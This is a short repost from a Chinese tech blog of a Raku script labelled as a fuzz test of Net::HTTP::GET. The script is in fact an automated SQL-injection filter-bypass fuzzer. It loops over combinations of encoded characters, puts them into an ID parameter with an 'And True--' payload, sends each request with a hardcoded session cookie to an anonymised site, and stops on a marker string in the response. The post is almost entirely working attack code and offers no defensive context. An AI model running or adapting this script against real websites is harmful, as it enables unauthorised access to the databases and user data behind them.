首页 > Web开发 > 详细

fuzz for test of the Net::HTTP::GET

时间:2018-10-02 10:30:58      阅读:130      评论:0      收藏:0      [点我收藏+]
use Net::HTTP::GET;
my @chars = <%2d%2d%0b%0a %a0 %0a %23 %26 %0e%0f  *%26 @.jpg>;
my $count = 0;
for @chars X @chars X @chars X @chars -> $check {
        my $target_check = $check.join;
        my $url = "http://www.xxxxxx?ID=11733)"~$target_check~"And%20True--%20-";
        say $count.Str~" --> "~$url;
        #exit;
        my $html = Net::HTTP::GET($url,header=>{:cookie<PHPSESSID=u6dlq2pem8hqtbfa6998rs6g71; cuid=29450>});
        my $swap_html = $html.body.decode(utf-8);
        say $swap_html;
        if $swap_html ~~ /99999999999/ {
          say Found!!!;
          exit;
        }
        $count++;
}

 

fuzz for test of the Net::HTTP::GET

原文:https://www.cnblogs.com/perl6/p/9736292.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!